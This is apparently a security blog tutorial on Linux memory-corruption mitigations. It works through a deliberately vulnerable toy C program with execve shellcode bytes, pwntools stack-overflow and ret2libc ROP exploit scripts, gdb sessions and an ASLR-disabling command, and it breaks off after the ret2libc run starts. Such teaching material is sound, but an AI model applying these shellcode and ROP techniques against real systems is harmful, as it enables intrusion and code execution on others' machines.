Understanding binary protections (and how to bypass them) with a dumb example

Hi! Long time no see, huh? I must apologize for my lousy posting schedule. Even though the covid-19 outbreak is forcing us to stay home, I’ve never had less time to spare in my life. Well, let’s get to it.

Memory corruption issues often lead to pretty serious vulnerabilities. It is not uncommon for a stack or heap overflow, use-after-free, double free and others to lead to code execution. A few mitigations try to prevent this class of bugs from causing too much trouble, or at least to make the exploitation harder. Nevertheless, memory corruption is still a thing. Today we’ll talk about these mitigations, how they work, how effective they are and how they are commonly bypassed.

In the beginning…

Back in the day, memory corruption was a sure path towards code execution. There were no protections at all, and a simple stack overflow was enough to hijack the control flow.

Nowadays, when you use GCC to compile a simple C program on a modern distribution, the generated binary is protected as hell. Let’s check it out:

test.c

#include <stdio.h>
#define SIZE 16

void get_buffer(char *strout)
{
    printf("Please input a string (max length %d)\n", SIZE);
    gets(strout); //oh, shush
}

int main (int argc, char **argv)
{
    char buf[SIZE];
    get_buffer(buf);
    printf("The buffer is:\n%s",buf);
    return 0;
}

└────╼ gcc test.c -o test
└────╼ checksec --file=test

RELRO           STACK CANARY      NX            PIE            
Full RELRO      Canary found      NX enabled    PIE enabled   

It has full RELRO, a stack canary, NX and PIE. Not to mention that Linux will, by default, provide ASLR at runtime. (A little lost in these terms? No worries, we’ll go over them in no time.)

So let’s rewind to the early days and deactivate all these memory protections. We’ll enable them later and see how they affect exploitation.

└────╼ gcc test.c -o test -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro
└────╼ checksec --file=test
RELRO           STACK CANARY      NX            PIE             
No RELRO        No canary found   NX disabled   No PIE

We compile our test file with no protections at all. I’ll also deactivate ASLR protection on my box:

└────╼ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Now we clearly have a stack overflow (or a stack out-of-bounds memory write, if you prefer). This program can easily be turned into a shell for code execution. If you have no idea how to do this, this is a good place to start. In that blog post we cracked an OSCP-like stack overflow on Windows. Here we use Linux. The tools are different, but the principles are the same.

Keep in mind that this is a mock test program, which will be used for our examples today. It runs locally, but you can (use your imagination and) picture it as if it were reading input from a server, for example.

We now need to craft a shellcode (code that will give us a shell!) to trigger code execution.

Crafting our payload

First we need a shellcode. There’s no need to reinvent the wheel. Here is an x64 shellcode we can use (thank you, shell-storm!).

The assembly for the shellcode is shown below. Although assembly can be tough to understand at times, I have added a few comments that might make it easier to grasp:

    xor eax, eax ; Zeroes out eax (writing eax also clears the upper half of rax)
    mov rbx, 0xFF978CD091969DD1 ; "/bin/sh" followed by a null byte, but negated, so the shellcode itself contains no null byte (which string functions would treat as the end of the input)
    neg rbx ; Negates rbx, turning it back into "/bin/sh\0"
    push rbx ; Pushes rbx to the stack
    push rsp ; Pushes rsp (which now points to "/bin/sh") to the stack
    pop rdi ; and pops it into rdi. Now rdi points to "/bin/sh" (1st execve argument)
    cdq ; Sign-extends eax into edx; since eax is 0, this zeroes out rdx (envp = NULL)
    push rdx ; Pushes zero to the stack (the NULL that terminates argv)
    push rdi ; Pushes rdi, the pointer to the "/bin/sh" string
    push rsp ; Pushes rsp and
    pop rsi ; pops it into rsi. rsi now points to argv = {"/bin/sh", NULL} (2nd argument)
    mov al, 0x3b ; execve syscall number (59); the rest of rax is already zero
    syscall ; SYSCALLS!

In short, it calls the execve syscall as execve("/bin/sh", {"/bin/sh", NULL}, NULL), which replaces the process with a shell.

And if we assemble this right (or just copy it from shell-storm), we get the following bytes:

\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05
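If you’d rather not take the negation trick on faith, here is a quick sanity check in plain Python 3 (standard library only, no pwntools). It’s just a sketch: it redoes the arithmetic of the neg rbx instruction on the constant above and checks the bytes for nulls and newlines:

```python
import struct

# The 27 bytes above, grouped by instruction.
SHELLCODE = bytes.fromhex(
    "31c0" "48bbd19d9691d08c97ff" "48f7db" "53" "54" "5f" "99"
    "52" "57" "54" "5e" "b03b" "0f05"
)
NEGATED = 0xFF978CD091969DD1

# neg rbx computes the 64-bit two's complement of the register.
binsh = (-NEGATED) & 0xFFFFFFFFFFFFFFFF

print(hex(binsh))                # 0x68732f6e69622f
print(struct.pack("<Q", binsh))  # b'/bin/sh\x00' (little-endian, null at the end)
print(len(SHELLCODE), b"\x00" in SHELLCODE, b"\n" in SHELLCODE)  # 27 False False
```

The null byte only exists after neg runs, which is the whole point of the trick.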

As this is not a stack overflow tutorial, I won’t go into too much detail about the creation of our payload. Instead, I’ll keep it brief. If you feel lost, I strongly recommend looking into the OSCP-like stack overflow exploitation tutorial.

I’ll run the program and attach GDB to it. I’ll also put a breakpoint on main’s ret (or, rather, retq) instruction.

(gdb) disass main
Dump of assembler code for function main:
   0x000000000040052d <+0>:	push   %rbp
   0x000000000040052e <+1>:	mov    %rsp,%rbp
   0x0000000000400531 <+4>:	sub    $0x20,%rsp
   0x0000000000400535 <+8>:	mov    %edi,-0x14(%rbp)
   0x0000000000400538 <+11>:	mov    %rsi,-0x20(%rbp)
   0x000000000040053c <+15>:	lea    -0x10(%rbp),%rax
   0x0000000000400540 <+19>:	mov    %rax,%rdi
   0x0000000000400543 <+22>:	callq  0x4004f7 <get_buffer>
   0x0000000000400548 <+27>:	lea    -0x10(%rbp),%rax
   0x000000000040054c <+31>:	mov    %rax,%rsi
   0x000000000040054f <+34>:	lea    0xc9(%rip),%rdi        # 0x40061f
   0x0000000000400556 <+41>:	mov    $0x0,%eax
   0x000000000040055b <+46>:	callq  0x4003f0 <printf@plt>
   0x0000000000400560 <+51>:	mov    $0x0,%eax
   0x0000000000400565 <+56>:	leaveq 
   0x0000000000400566 <+57>:	retq   
(gdb) b *0x0000000000400566
Breakpoint 3 at 0x400566

Now I’ll send a bunch of “A”s to see if we can trigger anything.

Please input a string (max length 16)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

And our breakpoint hits. Let’s see what’s on the stack.

Thread 1 "test" hit Breakpoint 3, 0x0000000000400566 in main ()
(gdb) x/10x $rsp
0x7fffffffdda8:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddb8:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddc8:	0x41414141	0x41414141


So our payload is on the stack right before retq executes. retq is effectively pop rip: it pops the value at the top of the stack into the instruction pointer, and execution continues from there. Since we control part of the stack, we can put our shellcode somewhere in there. But how would we trigger it?

Since the stack address will remain the same every time we run the program (ASLR is off), we can put the address of our shellcode at 0x7fffffffdda8, where the return address is, and the shellcode itself right after it (0x7fffffffddb0). By doing some inspection (printing values on the stack), we find out that the region we control starts at 0x7fffffffdd90.

How do I know this? Well, I used a cyclic pattern. But another way is by mere inspection:

(gdb) x/10x $rsp-30
0x7fffffffdd8a:	0x00010040	0x41410000	0x41414141	0x41414141
0x7fffffffdd9a:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddaa:	0x41414141	0x41414141
(gdb) x/10x $rsp-24
0x7fffffffdd90:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdda0:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddb0:	0x41414141	0x41414141
(gdb) x/10x $rsp-25
0x7fffffffdd8f:	0x41414100	0x41414141	0x41414141	0x41414141
0x7fffffffdd9f:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffddaf:	0x41414141	0x41414141

By inspection, we see that when retq executes, the stack pointer points to offset 24 of our input.
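About that pattern trick: the idea is to send a de Bruijn sequence, in which every 4-byte chunk appears only once, so whatever ends up at $rsp tells you its own offset. pwntools ships this as cyclic() and cyclic_find(); below is a minimal stand-alone sketch of the same idea (my own re-implementation with the classic recursive de Bruijn construction, standard library only, not pwntools’ code):

```python
import itertools
import struct


def de_bruijn(alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """Yield a de Bruijn sequence B(k, n): every length-n string over alphabet occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern."""
    return bytes(itertools.islice(de_bruijn(n=n), length))


def cyclic_find(chunk, n=4, search_len=10000):
    """Offset of the first n bytes of `chunk` inside the pattern (-1 if absent)."""
    return cyclic(search_len, n).find(chunk[:n])


pattern = cyclic(100)  # send this instead of the A's
# At the breakpoint on ret, `x/gx $rsp` shows 8 bytes of the pattern as a qword.
# Simulate that by reading the qword that sits at offset 24 of our input.
qword_at_rsp = struct.unpack("<Q", pattern[24:32])[0]
print(cyclic_find(struct.pack("<Q", qword_at_rsp)))  # 24
```

Note the qword is packed back to little-endian bytes before the lookup, since that is the order the bytes had in our input.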

So we need 24 bytes of padding. This is what our payload will look like:

[24 bytes padding] + [address to our shellcode (0x7fffffffddb0)] + [shellcode]

Using python to build our payload and print it, or send it to a file, or call the program directly, we’d have this:

payload = b"A"*24 + b"\xb0\xdd\xff\xff\xff\x7f\x00\x00\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
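If you don’t have pwntools around, the same bytes can be built with the standard library’s struct module. A minimal sketch (the constants are the ones found in this section, so they are only valid with ASLR off on this box); it also checks for the one byte gets() can’t swallow:

```python
import struct

RET_OFFSET = 24                  # distance from buf to the saved return address (found above)
SHELLCODE_ADDR = 0x7fffffffddb0  # where the shellcode lands, right after the return address
SHELLCODE = bytes.fromhex("31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05")


def build_payload():
    payload = b"A" * RET_OFFSET + struct.pack("<Q", SHELLCODE_ADDR) + SHELLCODE
    # gets() stops reading at '\n' (0x0a), so that byte must not appear in the payload.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte")
    return payload


payload = build_payload()
print(len(payload), payload[24:32].hex())
```

Null bytes in the address are fine here: gets() only stops at a newline.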

I’ll write a python “exploit” for this using pwntools:

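from pwn import *
context(arch='amd64', os='linux')

# 24 bytes of padding (16-byte buf + 8-byte saved rbp) reach main's return address
padding = b"A"*24
# Overwrite the return address with the stack address where the shellcode will sit
ret_addr = p64(0x7fffffffddb0)
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
payload = padding + ret_addr + shellcode

io = process("/home/danilo/tmp/test")
io.readline()         # "Please input a string (max length 16)"
io.sendline(payload)  # gets() reads everything up to the newline
io.interactive()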

What this code does is open the target program, read the “Please input a string (max length 16)” line, send our payload and open an interactive channel with the program. The result is a shell:

└────╼ python3 exploit.py 
[+] Starting local process '/home/danilo/tmp/test': pid 20836
[*] Switching to interactive mode
The buffer is:
$ ls
exploit.py  test  test.c
$ pwd
/home/danilo/tmp
$ 

Great! So upon finding a buffer overflow, it is relatively easy to exploit it into code execution. Or at least it was a couple of decades ago. Now let’s enable the protections and see how it goes.

In the next few sections I’ll present each memory corruption mitigation. They are not in any specific order.

Stack Canary


How cute are canaries?

Well, very cute. According to Wikipedia, coal miners used canaries to detect toxic gases, such as carbon monoxide, in the mines. “Canary” is also slang for a snitch: an informant who sings to the police. And, in software, canaries are very effective against stack overflow vulnerabilities.

The issue with the program we wrote in the previous section was a stack overflow. That means we had a buffer on our stack into which we could write an arbitrary amount of data, even beyond the buffer’s allocated size. An adversary may overwrite other data in memory, such as the return address, and hijack the control flow, leading to arbitrary code execution.

The stack canary is designed to detect that the return address has been overwritten, making it more difficult to hijack the control flow.

It works very simply, but also very elegantly. An 8-byte semi-random value (the canary) is placed between the local buffers and the return address on the stack (see the representation below). Before the function returns, it checks whether the canary has been altered. If it hasn’t, execution continues normally. If it has, the program aborts. I said semi-random because not all bytes are random: there are 7 random bytes and a null byte ('\0'), which on x86-64 is the lowest byte and therefore the first one in memory. An adversary with a linear out-of-bounds write has to overwrite the canary to reach the return address. The null byte was chosen because it is the string terminator: an adversary exploiting a string-based overflow (strcpy and friends) will have trouble writing a null byte in the middle of the payload. And in case of a memory leak through a string function, the null byte terminates the string before the rest of the canary can be printed.

+-----------------------+
|                       |
|         ...           |
|                       |
+-----------------------+
|                       |
|                       |
|                       |
|   Vulnerable buffer   |
|                       |
|                       |
|                       |
+-----------------------+
|                       |
|      Stack canary     |
+-----------------------+
|                       |
|     Return address    |
+-----------------------+
|                       |
|          ...          |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
|                       |
+-----------------------+

Let’s recompile our binary, now removing the -fno-stack-protector option:

gcc test.c -o test -z execstack -no-pie -Wl,-z,norelro

Now disassemble with gdb:

└────╼ gdb ./test
(gdb) disass main
Dump of assembler code for function main:
   0x000000000040059d <+0>:	push   %rbp
   0x000000000040059e <+1>:	mov    %rsp,%rbp
   0x00000000004005a1 <+4>:	sub    $0x30,%rsp
   0x00000000004005a5 <+8>:	mov    %edi,-0x24(%rbp)
   0x00000000004005a8 <+11>:	mov    %rsi,-0x30(%rbp)
   0x00000000004005ac <+15>:	mov    %fs:0x28,%rax
   0x00000000004005b5 <+24>:	mov    %rax,-0x8(%rbp)
   0x00000000004005b9 <+28>:	xor    %eax,%eax
   0x00000000004005bb <+30>:	lea    -0x20(%rbp),%rax
   0x00000000004005bf <+34>:	mov    %rax,%rdi
   0x00000000004005c2 <+37>:	callq  0x400567 <get_buffer>
   0x00000000004005c7 <+42>:	lea    -0x20(%rbp),%rax
   0x00000000004005cb <+46>:	mov    %rax,%rsi
   0x00000000004005ce <+49>:	lea    0xda(%rip),%rdi        # 0x4006af
   0x00000000004005d5 <+56>:	mov    $0x0,%eax
   0x00000000004005da <+61>:	callq  0x400460 <printf@plt>
   0x00000000004005df <+66>:	mov    $0x0,%eax
   0x00000000004005e4 <+71>:	mov    -0x8(%rbp),%rdx
   0x00000000004005e8 <+75>:	xor    %fs:0x28,%rdx
   0x00000000004005f1 <+84>:	je     0x4005f8 <main+91>
   0x00000000004005f3 <+86>:	callq  0x400450 <__stack_chk_fail@plt>
   0x00000000004005f8 <+91>:	leaveq 
   0x00000000004005f9 <+92>:	retq   
End of assembler dump.

Here we see the assembly code of the main function. Note these lines specifically:

...
   0x00000000004005ac <+15>:	mov    %fs:0x28,%rax
   0x00000000004005b5 <+24>:	mov    %rax,-0x8(%rbp)

...

   0x00000000004005e4 <+71>:	mov    -0x8(%rbp),%rdx
   0x00000000004005e8 <+75>:	xor    %fs:0x28,%rdx
   0x00000000004005f1 <+84>:	je     0x4005f8 <main+91>
   0x00000000004005f3 <+86>:	callq  0x400450 <__stack_chk_fail@plt>
   0x00000000004005f8 <+91>:	leaveq 
   0x00000000004005f9 <+92>:	retq   

In <+15> and <+24> it copies the canary from %fs:0x28 (a slot in thread-local storage) to %rbp-0x8. The reference value is set once when the program starts, so every protected function in the program uses the same canary.

Later on, at <+71> and <+75>, it loads the stored canary into %rdx and XORs it with the original value in %fs:0x28; the result is zero only if both are equal. If they are equal (<+84>), meaning the canary hasn’t been altered, it jumps to <+91> and leaves the function normally. If not, __stack_chk_fail is called, which aborts the program:

└────╼ ./test 
Please input a string (max length 16)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The buffer is:
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
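To see the whole mechanism in one place, here is a toy Python model of this main(). It’s a sketch, not what the compiler emits: the frame is a bytearray laid out according to the disassembly above (buf at rbp-0x20, canary at rbp-0x8), new_canary() and run_main() are made-up names, and writes past the frame are simply dropped:

```python
import os
import struct

# Layout of main's frame, read off the canary-enabled disassembly above:
#   buf    at rbp-0x20 -> offset 0 of our input
#   canary at rbp-0x08 -> offset 24
#   saved rbp and the return address follow the canary
CANARY_OFF = 0x20 - 0x08
FRAME_SIZE = 0x20 + 16  # buf..canary, plus saved rbp and return address


def new_canary():
    """glibc-style canary on x86-64: 7 random bytes and a zero lowest byte."""
    return int.from_bytes(b"\x00" + os.urandom(7), "little")


def run_main(user_input, canary):
    """Toy model of main(): gets(buf), printf("%s", buf), then the epilogue check."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<Q", frame, CANARY_OFF, canary)  # prologue: store the canary
    data = (user_input + b"\x00")[:FRAME_SIZE]          # gets() appends '\0'; excess is dropped
    frame[:len(data)] = data                            # no bounds check, just like gets()
    printed = bytes(frame).split(b"\x00", 1)[0]         # printf("%s") stops at the first '\0'
    (stored,) = struct.unpack_from("<Q", frame, CANARY_OFF)
    if stored ^ canary:                                 # epilogue: xor with the reference value
        return printed, "*** stack smashing detected ***"
    return printed, "returned normally"


canary = new_canary()
for n in (16, 24, 29):
    printed, status = run_main(b"A" * n, canary)
    print(n, len(printed), status)
```

The 29-byte input (the one from the run above) trips the check. The 24-byte case is the interesting one: the input reaches the canary, but the zero lowest byte stops printf, so none of the canary is printed.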

This mitigation kills the vulnerability here. However, note that the canary is not a silver bullet (or a silver shield??). It only detects writes that run over the canary itself; anything between the buffer and the canary, such as other local variables, can still be overwritten. It is also only effective against linear stack out-of-bounds writes. There are many other memory corruption bug classes, such as use-after-free, arbitrary read, arbitrary write, double free, and others. Moreover, the canary can be leaked, but that would depend on a second vulnerability.

In summary, canaries offer good protection against stack overflow vulnerabilities. Leaking the canary is a way to bypass this mitigation, but it depends on another vulnerability, and the null byte makes string-based leaks harder in most cases. However, canaries do not protect against other memory corruption vulnerabilities.

NX

The NX (no-execute) bit is used to mark regions of memory as non-executable. Normally there’s no reason to execute code from the stack or the heap, since all of the program’s code is in the .text section. With this protection enabled, adversaries need to get more creative to bypass the mitigation.

This mitigation also makes our payload useless, since our shellcode runs from the stack. If we send the same payload, the process crashes with exit code -11 (SIGSEGV). But is there a bypass?

Ret2libc

Well, yes. NX means we can’t add new code to the program, but we can still reuse code that is already there.

The return-to-libc technique overwrites return addresses so they point to existing code in libc: whole functions, or small snippets called gadgets. Libc is enormous, and there are gadgets to do pretty much anything. For instance, it contains the execve wrapper function, which issues the same execve syscall our shellcode used.

But exploiting gets a bit trickier.

First, we deactivate the canary again and enable NX by dropping the -z execstack option:

gcc test.c -o test -fno-stack-protector -no-pie -Wl,-z,norelro

To craft our new payload, we’ll be using GDB with the peda plugin and pwntools with python3.

The goal here is to reuse existing code to get where we want. We need to call the execve syscall. I have started the program and attached gdb to it. I’ll use disass execve to get the address of the execve libc wrapper:

gdb-peda$ disass execve
Dump of assembler code for function execve:
   0x00007ffff7ac6c00 <+0>:	mov    eax,0x3b
   0x00007ffff7ac6c05 <+5>:	syscall 
   0x00007ffff7ac6c07 <+7>:	cmp    rax,0xfffffffffffff001
   0x00007ffff7ac6c0d <+13>:	jae    0x7ffff7ac6c10 <execve+16>
   0x00007ffff7ac6c0f <+15>:	ret    
   0x00007ffff7ac6c10 <+16>:	mov    rcx,QWORD PTR [rip+0x306251]        # 0x7ffff7dcce68
   0x00007ffff7ac6c17 <+23>:	neg    eax
   0x00007ffff7ac6c19 <+25>:	mov    DWORD PTR fs:[rcx],eax
   0x00007ffff7ac6c1c <+28>:	or     rax,0xffffffffffffffff
   0x00007ffff7ac6c20 <+32>:	ret    
End of assembler dump.

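Here we see that the execve function is at 0x00007ffff7ac6c00. We need to pass “/bin/bash” as the first argument to that syscall so it spawns a shell (which is our goal here). The wrapper just sets eax to 0x3b and issues the syscall, so the arguments go in rdi (filename), rsi (argv) and rdx (envp). That means rdi must point to the “/bin/bash” string, and rsi should be zero. You may be wondering how I know that. Well, I checked the Linux system call table. Strictly speaking, rdx (envp) matters too; we don’t set it here and simply rely on whatever value it holds when main returns, which worked in this run.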

To set these two registers we need gadgets: short sequences of existing instructions, ending in ret, that we can chain together to get the desired effect.

We need rdi to point to “/bin/bash”. We can put the string on the stack and use a pop rdi; ret gadget to load its address into rdi.

Fortunately, libc is gigantic and has enough gadgets to do anything we want, and peda makes it very easy to find them. First, let’s see what our payload will look like:

padding + pop rdi; ret + rdi value (pointer to "/bin/bash" string) + pop rsi; ret + rsi value (zero!) + execve addr + "/bin/bash"

It starts with the 24-byte padding. Then we set rdi to point to the “/bin/bash” string and zero out rsi. After that comes the execve address and, finally, the “/bin/bash” string itself.

To find our gadgets, we’ll use peda:

gdb-peda$ ropsearch "pop rdi; ret" libc
Searching for ROP gadget: 'pop rdi; ret' in: libc ranges
0x00007ffff7a035bf : (b'5fc3')	pop rdi; ret
0x00007ffff7a044ae : (b'5fc3')	pop rdi; ret
0x00007ffff7a04c37 : (b'5fc3')	pop rdi; ret
0x00007ffff7a04cbe : (b'5fc3')	pop rdi; ret
0x00007ffff7a05bd2 : (b'5fc3')	pop rdi; ret
0x00007ffff7a05f4b : (b'5fc3')	pop rdi; ret
0x00007ffff7a072e7 : (b'5fc3')	pop rdi; ret
0x00007ffff7a077ce : (b'5fc3')	pop rdi; ret
0x00007ffff7a07ce6 : (b'5fc3')	pop rdi; ret
0x00007ffff7a08260 : (b'5fc3')	pop rdi; ret
0x00007ffff7a088b9 : (b'5fc3')	pop rdi; ret
0x00007ffff7a08b81 : (b'5fc3')	pop rdi; ret
0x00007ffff7a09647 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0a677 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0b79c : (b'5fc3')	pop rdi; ret
0x00007ffff7a0be84 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0ca1f : (b'5fc3')	pop rdi; ret
0x00007ffff7a0d0cc : (b'5fc3')	pop rdi; ret
0x00007ffff7a0dbcc : (b'5fc3')	pop rdi; ret
0x00007ffff7a0e198 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0e261 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0ef59 : (b'5fc3')	pop rdi; ret
0x00007ffff7a0f204 : (b'5fc3')	pop rdi; ret
0x00007ffff7a102d3 : (b'5fc3')	pop rdi; ret
0x00007ffff7a10307 : (b'5fc3')	pop rdi; ret
--More--(25/489)

It has found 489 occurrences of “pop rdi; ret” in libc which we can use. Any one will do. I’ll use 0x00007ffff7a035bf to craft my payload.

Now the other gadget:

gdb-peda$ ropsearch "pop rsi; ret" libc
Searching for ROP gadget: 'pop rsi; ret' in: libc ranges
0x00007ffff7a05eea : (b'5ec3')	pop rsi; ret
0x00007ffff7a12097 : (b'5ec3')	pop rsi; ret
0x00007ffff7a229da : (b'5ec3')	pop rsi; ret
0x00007ffff7a40854 : (b'5ec3')	pop rsi; ret
0x00007ffff7a461b3 : (b'5ec3')	pop rsi; ret
0x00007ffff7a4d1c5 : (b'5ec3')	pop rsi; ret
0x00007ffff7a5e8a4 : (b'5ec3')	pop rsi; ret
0x00007ffff7a60e93 : (b'5ec3')	pop rsi; ret
0x00007ffff7a60ecb : (b'5ec3')	pop rsi; ret
0x00007ffff7a62ede : (b'5ec3')	pop rsi; ret
0x00007ffff7a640d4 : (b'5ec3')	pop rsi; ret
0x00007ffff7a641b8 : (b'5ec3')	pop rsi; ret
0x00007ffff7a64fc9 : (b'5ec3')	pop rsi; ret
0x00007ffff7a66fa6 : (b'5ec3')	pop rsi; ret
0x00007ffff7a66ff1 : (b'5ec3')	pop rsi; ret
0x00007ffff7a69c62 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6a6e0 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6aa17 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6aac0 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6aaf6 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6b32f : (b'5ec3')	pop rsi; ret
0x00007ffff7a6bd09 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6c138 : (b'5ec3')	pop rsi; ret
0x00007ffff7a6e5ee : (b'5ec3')	pop rsi; ret
0x00007ffff7a6f246 : (b'5ec3')	pop rsi; ret
--More--(25/149)

149 occurrences. Again, any one will do. I’ll use 0x00007ffff7a05eea.

Ok, so we refine our stack payload:

24-byte padding + 0x00007ffff7a035bf + STACK ADDRESS OF "/bin/bash" STRING + 0x00007ffff7a05eea + 0 + 0x00007ffff7ac6c00 + "/bin/bash"
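Before hunting for the string’s address, it may help to see how the CPU consumes this chain, one ret at a time. Here is a toy walk-through in Python: only the two gadgets we use are modelled, build_payload() and walk_chain() are made-up helpers, and the string address is the same 0xdeadbeefdeadbeef placeholder the exploit below uses:

```python
import struct

# Addresses from the gdb/peda session above (ASLR off on the author's box).
POP_RDI_RET = 0x00007ffff7a035bf
POP_RSI_RET = 0x00007ffff7a05eea
EXECVE = 0x00007ffff7ac6c00
BINSH_PLACEHOLDER = 0xdeadbeefdeadbeef  # the real stack address is found next with gdb


def build_payload(binsh_addr):
    """24 bytes of padding, the ROP chain, then the string itself."""
    chain = [POP_RDI_RET, binsh_addr, POP_RSI_RET, 0, EXECVE]
    return b"A" * 24 + b"".join(struct.pack("<Q", q) for q in chain) + b"/bin/bash"


def walk_chain(payload, offset=24):
    """Follow the chain from main's ret until execve is reached.

    Returns the rdi/rsi values execve would see and the final rip.
    """
    stack = payload[offset:]
    sp = 0
    regs = {"rdi": None, "rsi": None}

    def pop():
        nonlocal sp
        (value,) = struct.unpack_from("<Q", stack, sp)
        sp += 8
        return value

    rip = pop()  # main's ret pops the first qword into rip
    while rip != EXECVE:
        if rip == POP_RDI_RET:
            regs["rdi"] = pop()
        elif rip == POP_RSI_RET:
            regs["rsi"] = pop()
        else:
            raise ValueError(f"unknown gadget at {rip:#x}")
        rip = pop()  # the gadget's own ret pops the next address
    return regs, rip


regs, rip = walk_chain(build_payload(BINSH_PLACEHOLDER))
print({name: hex(value) for name, value in regs.items()}, hex(rip))
```

Each gadget eats exactly one value from the stack before its ret hands control to the next entry, which is why the chain alternates between gadget addresses and values.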

All that’s left to do is find the stack address of “/bin/bash”. Gdb can do that for us. I’ll prepare the payload with a placeholder (0xdeadbeefdeadbeef) instead of the stack address, send it, and see where the string lands. Check the “exploit” out:

from pwn import *
context(arch='amd64', os='linux')
addr_execve = 0x00007ffff7ac6c00 # execve
addr_poprdi_ret = 0x00007ffff7a035bf # pop rdi; ret
addr_poprsi_ret = 0x00007ffff7a05eea # pop rsi; ret
addr_binsh_str = 0xdeadbeefdeadbeef # placeholder, to be replaced with the real stack address

payload = b"A"*24 + pack(addr_poprdi_ret) + pack(addr_binsh_str) + pack(addr_poprsi_ret) + pack(0) +  pack(addr_execve) + b"/bin/bash" 

io = process("/home/danilo/tmp/test")

input() # Pause so we can attach gdb to the process before the payload is sent

io.readline()
io.sendline(payload)
io.interactive()

We run it and attach gdb, with a breakpoint on main’s ret instruction.

gdb-peda$ disass main
Dump of assembler code for function main:
   0x000000000040052d <+0>:	push   rbp
   0x000000000040052e <+1>:	mov    rbp,rsp
   0x0000000000400531 <+4>:	sub    rsp,0x20
   0x0000000000400535 <+8>:	mov    DWORD PTR [rbp-0x14],edi
   0x0000000000400538 <+11>:	mov    QWORD PTR [rbp-0x20],rsi
   0x000000000040053c <+15>:	lea    rax,[rbp-0x10]
   0x0000000000400540 <+19>:	mov    rdi,rax
   0x0000000000400543 <+22>:	call   0x4004f7 <get_buffer>
   0x0000000000400548 <+27>:	lea    rax,[rbp-0x10]
   0x000000000040054c <+31>:	mov    rsi,rax
   0x000000000040054f <+34>:	lea    rdi,[rip+0xc9]        # 0x40061f
   0x0000000000400556 <+41>:	mov    eax,0x0
   0x000000000040055b <+46>:	call   0x4003f0 <printf@plt>
   0x0000000000400560 <+51>:	mov    eax,0x0
   0x0000000000400565 <+56>:	leave  
   0x0000000000400566 <+57>:	ret    
End of assembler dump.
gdb-peda$ br *0x0000000000400566
Breakpoint 1 at 0x400566
gdb-peda$ c
Thread 1 "test" hit Breakpoint 1, 0x0000000000400566 in main ()
gdb-peda$ x/10x $rsp
0x7fffffffdda8:	0x00007ffff7a035bf	0xdeadbeefdeadbeef
0x7fffffffddb8:	0x00007ffff7a05eea	0x0000000000000000
0x7fffffffddc8:	0x00007ffff7ac6c00	0x7361622f6e69622f
0x7fffffffddd8:	0xd1b02fd71f9c0068	0x0000000000400410
0x7fffffffdde8:	0x00007fffffffde80	0x0000000000000000

Looks like we found our target. The string starts right after the execve address, at 0x7fffffffddd0:

gdb-peda$ x/s 0x7fffffffddd0
0x7fffffffddd0:	"/bin/bash"
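Since we know where the chain starts and how long it is, the string’s address can also be computed instead of looked up. A tiny sketch of that arithmetic, using the $rsp value from the breakpoint above (so it only holds while the stack doesn’t move, i.e. with ASLR off and the same environment):

```python
RET_SLOT = 0x7fffffffdda8  # $rsp when main's ret executes (gdb output above)
CHAIN = ["pop rdi; ret", "&/bin/bash", "pop rsi; ret", "0", "execve"]

# Each chain entry occupies one 8-byte qword, and the string follows the last one.
binsh_addr = RET_SLOT + 8 * len(CHAIN)
print(hex(binsh_addr))  # 0x7fffffffddd0
```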

So our final exploit is:

from pwn import *
context(arch='amd64', os='linux')
addr_execve = 0x00007ffff7ac6c00 # execve
addr_poprdi_ret = 0x00007ffff7a035bf # pop rdi; ret
addr_poprsi_ret = 0x00007ffff7a05eea # pop rsi; ret
addr_binsh_str = 0x7fffffffddd0

payload = b"A"*24 + pack(addr_poprdi_ret) + pack(addr_binsh_str) + pack(addr_poprsi_ret) + pack(0) +  pack(addr_execve) + b"/bin/bash" 

io = process("/home/danilo/tmp/test")
input() # Pause to attach gdb (press Enter to continue)
io.readline()
io.sendline(payload)
io.interactive()

And the result:

└────╼ python3 exploit.py 
[+] Starting local process '/home/danilo/tmp/test': pid 15432

[*] Switching to interactive mode
The buffer is:
